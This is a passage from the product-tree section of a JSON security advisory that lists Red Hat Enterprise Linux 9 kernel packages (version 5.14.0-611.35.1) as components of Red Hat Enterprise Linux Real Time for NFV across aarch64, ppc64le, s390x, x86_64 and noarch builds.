"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch"
},
"product_reference": "kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:5.14.0-611.35.1.el9_7.noarch as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch"
},
"product_reference": "kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
